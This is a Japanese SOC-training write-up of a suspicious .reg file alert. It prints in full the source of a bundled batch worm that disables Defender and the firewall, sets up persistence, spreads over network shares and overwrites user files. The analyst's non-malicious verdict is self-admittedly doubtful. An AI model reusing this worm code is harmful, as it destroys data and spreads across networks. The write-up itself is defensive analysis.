• Details
• playbook
  • Define Threat Indicator
  • Check if the malware is quarantined/cleaned
  • Analyze Malware
    • config.reg
    • importantUpdate.bat
  • Add Artifacts
• End

Details

EventID: 50
Event Time: Feb. 6, 2021, 1:58 p.m.
Rule: SOC117 - Suspicious .reg File
Level: Security Analyst
Source Address 172.16.17.51
Source Hostname Aldo
File Name config.reg
File Hash f705ac114767397fb5e7cd1603e70954
File Size 16.3 MB
Device Action Blocked
Download (Password:infected): f705ac114767397fb5e7cd1603e70954.zip

playbook

Define Threat Indicator

Answer:Other

Check if the malware is quarantined/cleaned

Device Action Blocked

Answer: Quarantined

Analyze Malware

config.reg

VirusTotal: https://www.virustotal.com/gui/file/97d7fc21caf2e830076d8d880bdfe906fae5a4925e6c1012087b764a75989089
HybridAnalysis:https://www.hybrid-analysis.com/sample/97d7fc21caf2e830076d8d880bdfe906fae5a4925e6c1012087b764a75989089
脅威であるようなレポートは無い。
中にはAutorunやStart up Folderに関わるKeyが見つかったが、

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS

コマンドが登録されているならともかく、ファイルが登録されていそうだ。それなら、そのファイルが無ければ問題無いのでは。

importantUpdate.bat

今回のzipファイルには何故か、別のファイルも含まれていた。
VirusTotal: https://www.virustotal.com/gui/file/fc4de26ede0690dbc4ef4ed7ffcc28c086d5c8998f2cbe1e2c3c20516c7da2db
このbatch wormに関しては、説明がstackoverflowに
malware - How this "batch worm" works? - Stack Overflow
ページの中身のテキストだけで、BAT/wormとしてアンチウイルスソフトに検出される。

@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"

rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)

自身の自動起動設定を行って、共有ドライブのUsersフォルダ内のStart up Folderに自身を登録して、Usersフォルダ内のファイルを全てimportantUpdate.batに書き換えるようだ。
まさにWorm


importantUpdate.batがMaliciousなので、Maliciousなのだろうか。
今回のアラートはregに対するものでregは、Non-Maliciousであると考えるので
Answer: Non-Malicious

Add Artifacts

Value	Type	Comment
f705ac114767397fb5e7cd1603e70954	MD5 Hash	unknown .reg file

TPとは言い切れないのでFPではないのかと。

End

ボロボロだ。
regにはAutorunやStart up Folderに関わるものがあったのは怪しいものだったか。他のも怪しいKeyはあったといえばあった。
怪しいならTPぐらいが良かったか。にしてもbatch wormは何だったのか。
一つ文句を言うなら、怪しい.regファイルは怪しく無くとも.regを使うケースの方が珍しいのでそもそもポリシーとして禁止しても良さそうではないか。